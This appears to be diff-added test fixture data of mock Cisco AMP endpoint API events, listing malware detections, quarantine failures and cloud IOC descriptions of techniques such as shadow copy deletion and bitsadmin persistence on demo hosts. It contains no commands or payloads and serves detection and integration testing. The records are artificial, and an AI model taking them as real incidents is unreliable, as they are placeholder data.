found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"SqGGuYXyy.exe","file_path":"\\\\?\\C:\\SqGGuYXyy.exe","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT4BBF.tmp","file_path":"\\\\?\\C:\\BIT4BBF.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739875754000,"timestamp":1610618750,"timestamp_nanoseconds":875739000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.","short_description":"W32.WScriptExecuteFakeExtension.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739868158500,"timestamp":1610618750,"timestamp_nanoseconds":868146000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.","short_description":"W32.Bitsadmin.ioc"},"file":{"disposition":"Clean","file_name":"bitsadmin.exe","file_path":"/C:/Windows/System32/bitsadmin.exe","identity":{"sha256":"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00"},"parent":{"disposition":"Clean","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739846959000,"timestamp":1610618750,"timestamp_nanoseconds":846943000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.","short_description":"W32.WScriptLaunchedZippedJS.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576726048000300,"timestamp":1610618696,"timestamp_nanoseconds":48000000,"date":"2021-01-14T10:04:56+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618696,"start_date":"2021-01-14T10:04:56+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"/C:/windows/system32/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576727672000300,"timestamp":1610618689,"timestamp_nanoseconds":672000000,"date":"2021-01-14T10:04:49+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610618689,"start_date":"2021-01-14T10:04:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.","short_description":"W32.BCDEditDisableRecovery.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/windows/system32/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458617561791000300,"timestamp":1610618620,"timestamp_nanoseconds":791000000,"date":"2021-01-14T10:03:40+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618620,"start_date":"2021-01-14T10:03:40+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.","short_description":"W32.FakeExtensionExec.RET"},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"/c:/users/rsteadman/downloads/report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":460392585524661250,"timestamp":1610618215,"timestamp_nanoseconds":615000000,"date":"2021-01-14T09:56:55+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618215,"start_date":"2021-01-14T09:56:55+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The psexec utility was executed as admin.","short_description":"W32.PsexecAsAdmin.ioc"},"file":{"disposition":"Clean","file_name":"PsExec.exe","file_path":"file:///C%3A/share%24/PsExec.exe","identity":{"sha256":"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef"},"parent":{"disposition":"Clean","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610611000,"timestamp_nanoseconds":758406329,"date":"2021-01-14T07:56:40+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136035192884000,"timestamp":1610603346,"timestamp_nanoseconds":403000000,"date":"2021-01-14T05:49:06+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610603346,"start_date":"2021-01-14T05:49:06+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"},"parent":{"disposition":"Clean","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515350231459808800,"timestamp":1610584664,"timestamp_nanoseconds":0,"date":"2021-01-14T00:37:44+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610584030,"timestamp_nanoseconds":579890366,"date":"2021-01-14T00:27:10+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583671182384431000,"timestamp":1610582528,"timestamp_nanoseconds":614000000,"date":"2021-01-14T00:02:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
